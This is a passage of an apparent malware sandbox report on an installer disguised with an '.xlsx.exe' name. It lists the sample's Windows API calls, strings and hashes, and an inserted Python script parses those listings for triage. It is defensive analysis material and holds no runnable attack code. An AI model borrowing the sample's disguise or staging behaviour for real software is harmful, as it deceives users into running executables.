                                                            • Part of subcall function 004051F2: SetWindowTextW.USER32(Skipped: C:\Users\user\AppData\Local\Temp\nsaCBA4.tmp\System.dll,Skipped: C:\Users\user\AppData\Local\Temp\nsaCBA4.tmp\System.dll), ref: 0040525F
                                                            • Part of subcall function 004051F2: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405285
                                                            • Part of subcall function 004051F2: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040529F
                                                            • Part of subcall function 004051F2: SendMessageW.USER32(?,00001013,?,00000000), ref: 004052AD
                                                            • Part of subcall function 004056C3: CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,004256F0,Error launching installer), ref: 004056E8
                                                            • Part of subcall function 004056C3: CloseHandle.KERNEL32(?), ref: 004056F5
                                                          • WaitForSingleObject.KERNEL32(00000000,?,00000000,000000EB,00000000), ref: 00401E80
                                                          • WaitForSingleObject.KERNEL32(?,?,0000000F), ref: 00401E95
                                                          • GetExitCodeProcess.KERNEL32(?,?), ref: 00401EA2
                                                          • CloseHandle.KERNEL32(?,00000000,000000EB,00000000), ref: 00401EC9
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1591325527.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.1591308411.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1592057361.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1592599968.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1592599968.0000000000421000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1592599968.0000000000426000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1592599968.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1592599968.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1592599968.0000000000446000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1593749927.000000000044A000.00000002.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_09-FD-94.jbxd
                                                          Similarity
                                                          • API ID: MessageSend$CloseHandleObjectProcessSingleWaitlstrlen$CodeCreateExitTextWindowlstrcat
                                                          • String ID:
                                                          • API String ID: 3585118688-0
                                                          • Opcode ID: e25249b87139e6aa3da4cb3d5fac545e17d625a69c27f26b2c2935b711216749
                                                          • Instruction ID: 663650117de36b32c607de2b5c5339e49b80fcfff4c178b035665d2e4b1c7066
                                                          • Opcode Fuzzy Hash: e25249b87139e6aa3da4cb3d5fac545e17d625a69c27f26b2c2935b711216749
                                                          • Instruction Fuzzy Hash: 8811A131E00204EBCF109FA0CD449EF7AB5EB44315F20447BE505B62E0C7798A82DBA9
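The function records in this report list each API call as `Name.MODULE(arg,arg,...), ref: address`, with calls made by callees prefixed "Part of subcall function <address>:". The record above is the classic launch-and-block sequence (CreateProcessW in the subcall, then WaitForSingleObject, GetExitCodeProcess and CloseHandle in the caller), and the string argument "Error launching installer" is what identifies that helper. The following Python is an added example, not part of the Joe Sandbox report and not the sandbox's own tooling: it parses a handful of these lines, copied from this page into a constructed sample, into structured records, flags the create/wait/exit-code pattern, and pulls out the non-hex arguments that are worth reading as strings. The regex, the record grouping on the "APIs" header and the triage heuristic are assumptions of this example.

```python
import re
from dataclasses import dataclass, field
from typing import List, Optional

# Constructed sample: lines copied from three function records on this page
# (the launch-and-wait record, the FreeLibrary record and the COMCTL32 #17 record).
SAMPLE = r"""
APIs
  • Part of subcall function 004056C3: CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,004256F0,Error launching installer), ref: 004056E8
  • Part of subcall function 004056C3: CloseHandle.KERNEL32(?), ref: 004056F5
• WaitForSingleObject.KERNEL32(00000000,?,00000000,000000EB,00000000), ref: 00401E80
• WaitForSingleObject.KERNEL32(?,?,0000000F), ref: 00401E95
• GetExitCodeProcess.KERNEL32(?,?), ref: 00401EA2
• CloseHandle.KERNEL32(?,00000000,000000EB,00000000), ref: 00401EC9
APIs
• FreeLibrary.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,00000000,75572EE0,00403861,75573420,0040366C,?), ref: 004038A4
• GlobalFree.KERNEL32(?), ref: 004038AB
APIs
• #17.COMCTL32 ref: 00403379
• SetErrorMode.KERNEL32(00008001), ref: 00403384
"""

# One API entry. Ordinal imports ("#17") have no argument list and no comma
# before "ref:", so both the parentheses and the comma are optional.
API_LINE = re.compile(
    r"^\s*•\s*"
    r"(?:Part of subcall function (?P<sub>[0-9A-F]{8}):\s*)?"
    r"(?P<api>[#\w]+)\.(?P<mod>[A-Za-z0-9_]+)"
    r"(?:\((?P<args>.*)\))?\s*,?\s*ref:\s*(?P<ref>[0-9A-F]{8})\s*$"
)


@dataclass
class ApiCall:
    api: str
    module: str
    args: List[str]
    ref: int                      # address of the call site
    subcall_of: Optional[int]     # callee address for "Part of subcall" entries, else None


@dataclass
class FunctionRecord:
    calls: List[ApiCall] = field(default_factory=list)

    def api_names(self, include_subcalls: bool = True):
        """Set of API names used by this function (optionally including callee calls)."""
        return {c.api for c in self.calls if include_subcalls or c.subcall_of is None}


def parse_api_section(text: str) -> List[FunctionRecord]:
    """Group API lines into records; every 'APIs' header starts a new function record."""
    records: List[FunctionRecord] = []
    current: Optional[FunctionRecord] = None
    for line in text.splitlines():
        if line.strip() == "APIs":
            current = FunctionRecord()
            records.append(current)
            continue
        m = API_LINE.match(line)
        if m is None or current is None:
            continue  # dump-source, hash and similarity lines are not API entries
        args = [a.strip() for a in m["args"].split(",")] if m["args"] is not None else []
        current.calls.append(ApiCall(
            api=m["api"], module=m["mod"], args=args,
            ref=int(m["ref"], 16),
            subcall_of=int(m["sub"], 16) if m["sub"] else None,
        ))
    return records


# Heuristic (assumption of this example): a function that creates a process,
# waits on a handle and reads the exit code is running a child to completion.
SPAWN_AND_WAIT = {"CreateProcessW", "WaitForSingleObject", "GetExitCodeProcess"}


def flag_spawn_and_wait(records: List[FunctionRecord]) -> List[int]:
    """Indices of records whose API set, including subcalls, covers SPAWN_AND_WAIT."""
    return [i for i, r in enumerate(records) if SPAWN_AND_WAIT <= r.api_names()]


def string_args(records: List[FunctionRecord]):
    """Argument values that are neither '?' nor an 8-digit hex word, i.e. readable strings."""
    hexlike = re.compile(r"^(?:\?|[0-9A-F]{8})$")
    found = set()
    for r in records:
        for c in r.calls:
            for a in c.args:
                if a and not hexlike.match(a):
                    found.add(a)
    return found


if __name__ == "__main__":
    recs = parse_api_section(SAMPLE)
    print("records:", len(recs), "spawn-and-wait:", flag_spawn_and_wait(recs))
    print("strings:", sorted(string_args(recs)))
```

Feeding the whole "Disassembly" section of a report through `parse_api_section` gives one record per function, so `flag_spawn_and_wait` and `string_args` work as a quick triage of which functions launch a child and which carry readable paths or messages, without opening the .jbxd snapshots.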
                                                          APIs
                                                          • IsWindowVisible.USER32(?), ref: 00405195
                                                          • CallWindowProcW.USER32(?,?,?,?), ref: 004051E6
                                                            • Part of subcall function 004041E6: SendMessageW.USER32(?,00000000,00000000,00000000), ref: 004041F8
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1591325527.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.1591308411.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1592057361.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1592599968.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1592599968.0000000000421000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1592599968.0000000000426000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1592599968.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1592599968.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1592599968.0000000000446000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1593749927.000000000044A000.00000002.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_09-FD-94.jbxd
                                                          Similarity
                                                          • API ID: Window$CallMessageProcSendVisible
                                                          • String ID:
                                                          • API String ID: 3748168415-3916222277
                                                          • Opcode ID: 843aab861ffb3f3227d1c446d01b64cf4776ac7e98eef2f295c4549480fb80e8
                                                          • Instruction ID: 7fff49106f067b4291516d9fc604604598bdb5380bd5c908914395e8565309e0
                                                          • Opcode Fuzzy Hash: 843aab861ffb3f3227d1c446d01b64cf4776ac7e98eef2f295c4549480fb80e8
                                                          • Instruction Fuzzy Hash: 26015E71900609BBDB205F51ED84B6B3A26E794364F604037FA007A2D1D77A9C919F69
                                                          APIs
                                                          • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,004256F0,Error launching installer), ref: 004056E8
                                                          • CloseHandle.KERNEL32(?), ref: 004056F5
                                                          Strings
                                                          • Error launching installer, xrefs: 004056D6
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1591325527.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.1591308411.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1592057361.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1592599968.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1592599968.0000000000421000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1592599968.0000000000426000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1592599968.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1592599968.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1592599968.0000000000446000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1593749927.000000000044A000.00000002.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_09-FD-94.jbxd
                                                          Similarity
                                                          • API ID: CloseCreateHandleProcess
                                                          • String ID: Error launching installer
                                                          • API String ID: 3712363035-66219284
                                                          • Opcode ID: e8775a5d6321f0dea89ce82b90cc6292b7a3bd0044cb503c25c375156348e7c2
                                                          • Instruction ID: 0bf1ed3311e3e942e0a1389e84d80c76f41ccd0b69acab1f7eccde3b1b9dfef0
                                                          • Opcode Fuzzy Hash: e8775a5d6321f0dea89ce82b90cc6292b7a3bd0044cb503c25c375156348e7c2
                                                          • Instruction Fuzzy Hash: D7E0E674E0020AAFDB009F64DD05D6B7B7DF710304F808521A915F2250D7B5E8108A7D
                                                          APIs
                                                          • FreeLibrary.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,00000000,75572EE0,00403861,75573420,0040366C,?), ref: 004038A4
                                                          • GlobalFree.KERNEL32(?), ref: 004038AB
                                                          Strings
                                                          • C:\Users\user\AppData\Local\Temp\, xrefs: 0040389C
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1591325527.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.1591308411.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1592057361.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1592599968.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1592599968.0000000000421000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1592599968.0000000000426000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1592599968.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1592599968.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1592599968.0000000000446000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1593749927.000000000044A000.00000002.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_09-FD-94.jbxd
                                                          Similarity
                                                          • API ID: Free$GlobalLibrary
                                                          • String ID: C:\Users\user\AppData\Local\Temp\
                                                          • API String ID: 1100898210-4083868402
                                                          • Opcode ID: dd483a302f27d7fd5815fa17d0cc140b668f4dc35d1ba6fe7e243829f05c23e7
                                                          • Instruction ID: 78adfbc6f23a2b3c20b59446217b09faef23a1eee4c9d5cf742f1d2697954a66
                                                          • Opcode Fuzzy Hash: dd483a302f27d7fd5815fa17d0cc140b668f4dc35d1ba6fe7e243829f05c23e7
                                                          • Instruction Fuzzy Hash: 2FE08C339041205BC621AF25AC08B1AB7A86F89B32F0581B6F9807B2A183746C624BD9
                                                          APIs
                                                          • lstrlenW.KERNEL32(80000000,C:\Users\user\Desktop,00402E28,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\09-FD-94.03.60.175.07.xlsx.exe,C:\Users\user\Desktop\09-FD-94.03.60.175.07.xlsx.exe,80000000,00000003), ref: 004059E5
                                                          • CharPrevW.USER32(80000000,00000000,80000000,C:\Users\user\Desktop,00402E28,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\09-FD-94.03.60.175.07.xlsx.exe,C:\Users\user\Desktop\09-FD-94.03.60.175.07.xlsx.exe,80000000,00000003), ref: 004059F5
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1591325527.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.1591308411.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1592057361.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1592599968.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1592599968.0000000000421000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1592599968.0000000000426000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1592599968.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1592599968.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1592599968.0000000000446000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1593749927.000000000044A000.00000002.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_09-FD-94.jbxd
                                                          Similarity
                                                          • API ID: CharPrevlstrlen
                                                          • String ID: C:\Users\user\Desktop
                                                          • API String ID: 2709904686-1876063424
                                                          • Opcode ID: 5322967536e1a0efddda02766e650d0d94df305eef9f06c9ed47c97fde570a53
                                                          • Instruction ID: c27c0225baf4744af390cb43684771b46df34b65c4403afa93d532b781e968ba
                                                          • Opcode Fuzzy Hash: 5322967536e1a0efddda02766e650d0d94df305eef9f06c9ed47c97fde570a53
                                                          • Instruction Fuzzy Hash: A8D05EB3400920DAD3226B04DC0199F73ACEF1131074644AAF501A21A5DB785D808BBD
                                                          APIs
                                                          • GlobalAlloc.KERNEL32(?,?), ref: 1000116A
                                                          • GlobalFree.KERNEL32(00000000), ref: 100011C7
                                                          • GlobalFree.KERNEL32(00000000), ref: 100011D9
                                                          • GlobalFree.KERNEL32(?), ref: 10001203
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1608943585.0000000010001000.00000020.00000001.01000000.00000006.sdmp, Offset: 10000000, based on PE: true
                                                          • Associated: 00000000.00000002.1608921207.0000000010000000.00000002.00000001.01000000.00000006.sdmp
                                                          • Associated: 00000000.00000002.1608963992.0000000010003000.00000002.00000001.01000000.00000006.sdmp
                                                          • Associated: 00000000.00000002.1609013607.0000000010005000.00000002.00000001.01000000.00000006.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_10000000_09-FD-94.jbxd
                                                          Similarity
                                                          • API ID: Global$Free$Alloc
                                                          • String ID:
                                                          • API String ID: 1780285237-0
                                                          • Opcode ID: 9cbcb91a2cf1141c01d88779e182a67407fb9f9860b92084c2da8ef292891df1
                                                          • Instruction ID: f345eba8489605592ce73ef35c78e6b42925bf5f5eceaf1f60f0973e38c56604
                                                          • Opcode Fuzzy Hash: 9cbcb91a2cf1141c01d88779e182a67407fb9f9860b92084c2da8ef292891df1
                                                          • Instruction Fuzzy Hash: AE318FF6904211DBF314CF64DC859EA77E8EB853D0B12452AFB45E726CEB34E8018765
                                                          APIs
                                                          • lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405D53,00000000,[Rename],00000000,00000000,00000000), ref: 00405B29
                                                          • lstrcmpiA.KERNEL32(00405D53,00000000), ref: 00405B41
                                                          • CharNextA.USER32(00405D53,?,00000000,00405D53,00000000,[Rename],00000000,00000000,00000000), ref: 00405B52
                                                          • lstrlenA.KERNEL32(00405D53,?,00000000,00405D53,00000000,[Rename],00000000,00000000,00000000), ref: 00405B5B
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1591325527.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.1591308411.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1592057361.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1592599968.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1592599968.0000000000421000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1592599968.0000000000426000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1592599968.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1592599968.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1592599968.0000000000446000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1593749927.000000000044A000.00000002.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_09-FD-94.jbxd
                                                          Similarity
                                                          • API ID: lstrlen$CharNextlstrcmpi
                                                          • String ID:
                                                          • API String ID: 190613189-0
                                                          • Opcode ID: f0f41473c1062d639537f97a351ef6b232bfd88747b8e1d85754dbc4161d6f9d
                                                          • Instruction ID: 19ad592fd5dcf9c9bc99336752ee576fec3eb52e2d0cc5b6bc7cc78b570e8094
                                                          • Opcode Fuzzy Hash: f0f41473c1062d639537f97a351ef6b232bfd88747b8e1d85754dbc4161d6f9d
                                                          • Instruction Fuzzy Hash: 5FF06231A04958AFC7129BA5DD4099FBBB8EF06350B2540A6F801F7251D674FE019BA9
                                                          APIs
                                                          • GetDlgItem.USER32(?,000003F9), ref: 00404B86
                                                          • GetDlgItem.USER32(?,?), ref: 00404B91
                                                          • GlobalAlloc.KERNEL32(?,?), ref: 00404BDB
                                                          • LoadBitmapW.USER32(0000006E), ref: 00404BEE
                                                          • SetWindowLongW.USER32(?,?,00405166), ref: 00404C07
                                                          • ImageList_Create.COMCTL32(?,?,00000021,00000006,00000000), ref: 00404C1B
                                                          • ImageList_AddMasked.COMCTL32(00000000,00000000,00FF00FF), ref: 00404C2D
                                                          • SendMessageW.USER32(?,00001109,00000002), ref: 00404C43
                                                          • SendMessageW.USER32(?,0000111C,00000000,00000000), ref: 00404C4F
                                                          • SendMessageW.USER32(?,0000111B,?,00000000), ref: 00404C61
                                                          • DeleteObject.GDI32(00000000), ref: 00404C64
                                                          • SendMessageW.USER32(?,00000143,00000000,00000000), ref: 00404C8F
                                                          • SendMessageW.USER32(?,00000151,00000000,00000000), ref: 00404C9B
                                                          • SendMessageW.USER32(?,00001132,00000000,?), ref: 00404D31
                                                          • SendMessageW.USER32(?,0000110A,00000003,00000000), ref: 00404D5C
                                                          • SendMessageW.USER32(?,00001132,00000000,?), ref: 00404D70
                                                          • GetWindowLongW.USER32(?,?), ref: 00404D9F
                                                          • SetWindowLongW.USER32(?,?,00000000), ref: 00404DAD
                                                          • ShowWindow.USER32(?,00000005), ref: 00404DBE
                                                          • SendMessageW.USER32(?,00000419,00000000,?), ref: 00404EBB
                                                          • SendMessageW.USER32(?,00000147,00000000,00000000), ref: 00404F20
                                                          • SendMessageW.USER32(?,?,00000000,00000000), ref: 00404F35
                                                          • SendMessageW.USER32(?,?,00000000,?), ref: 00404F59
                                                          • SendMessageW.USER32(?,00000200,00000000,00000000), ref: 00404F79
                                                          • ImageList_Destroy.COMCTL32(?), ref: 00404F8E
                                                          • GlobalFree.KERNEL32(?), ref: 00404F9E
                                                          • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00405017
                                                          • SendMessageW.USER32(?,00001102,?,?), ref: 004050C0
                                                          • SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 004050CF
                                                          • InvalidateRect.USER32(?,00000000,00000001), ref: 004050EF
                                                          • ShowWindow.USER32(?,00000000), ref: 0040513D
                                                          • GetDlgItem.USER32(?,000003FE), ref: 00405148
                                                          • ShowWindow.USER32(00000000), ref: 0040514F
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.2751058770.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000002.00000002.2751038431.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000002.00000002.2751193490.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000002.00000002.2751232298.0000000000409000.00000008.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000002.00000002.2751286933.000000000044A000.00000002.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_400000_09-FD-94.jbxd
                                                          Similarity
                                                          • API ID: MessageSend$Window$ImageItemList_LongShow$Global$AllocBitmapCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
                                                          • String ID: $M$N
                                                          • API String ID: 1638840714-813528018
                                                          • Opcode ID: eeda71b71a34d3a0b7ba0c5416e900ef86050f568373e52e0e63e9c387a85d2f
                                                          • Instruction ID: c838968d9b53d15d037ad3ebbdc97e0e82191de3b695f5e6670933e8e46a19ea
                                                          • Opcode Fuzzy Hash: eeda71b71a34d3a0b7ba0c5416e900ef86050f568373e52e0e63e9c387a85d2f
                                                          • Instruction Fuzzy Hash: E9026EB0A00209EFDB209F94DC85AAE7BB5FB44314F10857AF610BA2E1C7799D42CF58
                                                          APIs
                                                          • #17.COMCTL32 ref: 00403379
                                                          • SetErrorMode.KERNEL32(00008001), ref: 00403384
                                                          • OleInitialize.OLE32(00000000), ref: 0040338B
                                                            • Part of subcall function 004062B2: GetModuleHandleA.KERNEL32(?,?,?,0040339D,00000009), ref: 004062C4
                                                            • Part of subcall function 004062B2: LoadLibraryA.KERNEL32(?,?,?,0040339D,00000009), ref: 004062CF
                                                            • Part of subcall function 004062B2: GetProcAddress.KERNEL32(00000000,?), ref: 004062E0
                                                          • SHGetFileInfoW.SHELL32(004206A8,00000000,?,?,00000000), ref: 004033B3
                                                            • Part of subcall function 00405F48: lstrcpynW.KERNEL32(?,?,?,004033C8,00428200,NSIS Error), ref: 00405F55
                                                          • GetCommandLineW.KERNEL32(00428200,NSIS Error), ref: 004033C8
                                                          • GetModuleHandleW.KERNEL32(00000000,00434000,00000000), ref: 004033DB
                                                          • CharNextW.USER32(00000000,00434000,?), ref: 00403403
                                                          • GetTempPathW.KERNEL32(?,00436800,00000000,?), ref: 0040353B
                                                          • GetWindowsDirectoryW.KERNEL32(00436800,000003FB), ref: 0040354C
                                                          • lstrcatW.KERNEL32(00436800,\Temp), ref: 00403558
                                                          • GetTempPathW.KERNEL32(?,00436800,00436800,\Temp), ref: 0040356C
                                                          • lstrcatW.KERNEL32(00436800,Low), ref: 00403574
                                                          • SetEnvironmentVariableW.KERNEL32(TEMP,00436800,00436800,Low), ref: 00403585
                                                          • SetEnvironmentVariableW.KERNEL32(TMP,00436800), ref: 0040358D
                                                          • DeleteFileW.KERNEL32(00436000), ref: 004035A1
                                                          • OleUninitialize.OLE32(?), ref: 0040366C
                                                          • ExitProcess.KERNEL32 ref: 0040368C
                                                          • lstrcatW.KERNEL32(00436800,~nsu.tmp,00434000,00000000,?), ref: 00403698
                                                          • lstrcmpiW.KERNEL32(00436800,00435800,00436800,~nsu.tmp,00434000,00000000,?), ref: 004036A4
                                                          • CreateDirectoryW.KERNEL32(00436800,00000000), ref: 004036B0
                                                          • SetCurrentDirectoryW.KERNEL32(00436800), ref: 004036B7
                                                          • DeleteFileW.KERNEL32(0041FEA8,0041FEA8,?,0042A000,?), ref: 00403711
                                                          • CopyFileW.KERNEL32(00437800,0041FEA8,00000001), ref: 00403725
                                                          • CloseHandle.KERNEL32(00000000,0041FEA8,0041FEA8,?,0041FEA8,00000000), ref: 00403752
                                                          • GetCurrentProcess.KERNEL32(?,00000006,00000006,00000005,?), ref: 004037AC
                                                          • ExitWindowsEx.USER32(00000002,80040002), ref: 00403804
                                                          • ExitProcess.KERNEL32 ref: 00403827
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.2751058770.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000002.00000002.2751038431.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000002.00000002.2751193490.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000002.00000002.2751232298.0000000000409000.00000008.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000002.00000002.2751286933.000000000044A000.00000002.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_400000_09-FD-94.jbxd
                                                          Similarity
                                                          • API ID: File$DirectoryExitHandleProcesslstrcat$CurrentDeleteEnvironmentModulePathTempVariableWindows$AddressCharCloseCommandCopyCreateErrorInfoInitializeLibraryLineLoadModeNextProcUninitializelstrcmpilstrcpyn
                                                          • String ID: Error launching installer$Error writing temporary file. Make sure your temp folder is valid.$Low$NSIS Error$SeShutdownPrivilege$TEMP$TMP$\Temp$~nsu.tmp
                                                          • API String ID: 4107622049-1875889550
                                                          • Opcode ID: d952f9c30b305397e7321c136bd4514fabccd71d09d56b1e0123fd5a1a2d1ce8
                                                          • Instruction ID: 39938aed3c042d93969ea090ff24049052e59ae08dabad03a7e97e37c14ef613
                                                          • Opcode Fuzzy Hash: d952f9c30b305397e7321c136bd4514fabccd71d09d56b1e0123fd5a1a2d1ce8
                                                          • Instruction Fuzzy Hash: 8AC12670604311AAD720BF659C49A2B3EACEB8574AF10483FF480B62D2D77D9D41CB6E
                                                          APIs
                                                          • DeleteFileW.KERNEL32(?,?,00436800,75572EE0,00434000), ref: 004057F9
                                                          • lstrcatW.KERNEL32(004246F0,\*.*,004246F0,?,?,00436800,75572EE0,00434000), ref: 00405841
                                                          • lstrcatW.KERNEL32(?,00409014,?,004246F0,?,?,00436800,75572EE0,00434000), ref: 00405864
                                                          • lstrlenW.KERNEL32(?,?,00409014,?,004246F0,?,?,00436800,75572EE0,00434000), ref: 0040586A
                                                          • FindFirstFileW.KERNEL32(004246F0,?,?,?,00409014,?,004246F0,?,?,00436800,75572EE0,00434000), ref: 0040587A
                                                          • FindNextFileW.KERNEL32(00000000,00000010,000000F2,?,?,?,?,0000002E), ref: 0040591A
                                                          • FindClose.KERNEL32(00000000), ref: 00405929
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.2751058770.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000002.00000002.2751038431.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000002.00000002.2751193490.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000002.00000002.2751232298.0000000000409000.00000008.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000002.00000002.2751286933.000000000044A000.00000002.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_400000_09-FD-94.jbxd
                                                          Similarity
                                                          • API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
                                                          • String ID: \*.*
                                                          • API String ID: 2035342205-1173974218
                                                          • Opcode ID: 3bfd9f40d867dfb13d75fcd1b7ef3c21c8eb5f8be3eae84d4eb3b7d6c7e95577
                                                          • Instruction ID: 2292a97837c012d07e09995a86319137dd3f2048718c0aa8a22e23afcdeedbd0
                                                          • Opcode Fuzzy Hash: 3bfd9f40d867dfb13d75fcd1b7ef3c21c8eb5f8be3eae84d4eb3b7d6c7e95577
                                                          • Instruction Fuzzy Hash: BF41C171800914EACF217B668C49BBF7678EB81328F24817BF811761D1D77C4E829E6E
                                                          Memory Dump Source
